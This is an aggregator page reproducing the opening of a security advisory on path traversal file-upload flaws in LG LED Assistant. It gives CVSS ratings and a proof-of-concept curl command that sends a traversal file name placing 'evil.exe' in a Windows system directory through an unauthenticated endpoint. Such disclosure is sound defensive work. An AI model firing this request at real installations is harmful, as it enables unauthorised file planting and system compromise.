all InfoSec news logo
all InfoSec news - Your InfoSec news aggregator
Log in Sign up
all InfoSec news

LG LED Assistant Multiple Vulnerabilities

Add to bookmarks
Nov. 27, 2023, 4:57 p.m. | Jimi Sebree

Tenable Research Advisories www.tenable.com

LG LED Assistant Multiple Vulnerabilities

seamCorrectionFileCreate Path Traversal File Upload

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

A path traversal vulnerability exists in the endpoint handler for /api/management/seamCorrectionFileCreate in Management.js. An unauthenticated remote attacker can exploit this to upload arbitrary files to any location on the disk drive where the product is installed.

PoC:

curl -ki -d 'fileName=../../../../../../../windows/system32/evil.exe&coef=["\u0011\u0022\u0033\u0044"]' ':8787/api/management/seamCorrectionFileCreate'>

get3DLutFile Path Traversal File Upload

(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)

A path traversal vulnerability exists in the endpoint handler for /api/Management/get3DLutFile in Management.js. An unauthenticated remote attacker can exploit this to …

amp api arbitrary files assistant attacker curl cvss disk drive endpoint evil exploit file filename files file upload led location management path path traversal path traversal vulnerability poc product unauthenticated upload vulnerabilities vulnerability windows

Visit resource

More from www.tenable.com / Tenable Research Advisories

Multiple Vulnerabilities in Adobe FrameMaker Publishing Server (FMPS) December 2022 release Update 2 3 days, 6 hours ago | www.tenable.com
adobe adobe framemaker api api authentication +13
Google Cloud Platform (GCP) Privilege Escalation Vulnerability In Cloud Functions 5 days, 5 hours ago | www.tenable.com
cloud cloud functions cloud platform escalation +9
Google Cloud Platform (GCP) Privilege Escalation Vulnerability In Cloud Functions 5 days, 5 hours ago | www.tenable.com
cloud cloud functions cloud platform escalation +9
Microsoft Azure Firewall Bypass Vulnerability 6 days, 7 hours ago | www.tenable.com
azure bypass bypass vulnerability firewall +4
Google Cloud Platform Remote Code Execution Vulnerability in GCP Composer 1 week ago | www.tenable.com
arbitrary code attackers cloud cloud platform +19
Fluent Bit Memory Corruption Vulnerability 3 weeks, 2 days ago | www.tenable.com
corruption memory memory corruption vulnerability
Cross-Site Scripting in WordPress RSS Aggregator Plugin 3 weeks, 5 days ago | www.tenable.com
cross-site plugin rss scripting +1
Solidus Stored Cross-Site Scripting 3 weeks, 5 days ago | www.tenable.com
cross-site inject javascript malicious +8
CyberPower PowerPanel Enterprise Power Device Network Utility Multiple Vulnerabilities 1 month ago | www.tenable.com
access account action admin +42

Jobs in InfoSec / Cybersecurity

Post a Job Search Talent

CyberSOC Technical Lead

@ Integrity360 | Sandyford, Dublin, Ireland
View on infosec-jobs.com

Cyber Security Strategy Consultant

@ Capco | New York City
View on infosec-jobs.com

Cyber Security Senior Consultant

@ Capco | Chicago, IL
View on infosec-jobs.com

Senior Security Researcher - Linux MacOS EDR (Cortex)

@ Palo Alto Networks | Tel Aviv-Yafo, Israel
View on infosec-jobs.com

Sr. Manager, NetSec GTM Programs

@ Palo Alto Networks | Santa Clara, CA, United States
View on infosec-jobs.com

SOC Analyst I

@ Fortress Security Risk Management | Cleveland, OH, United States
View on infosec-jobs.com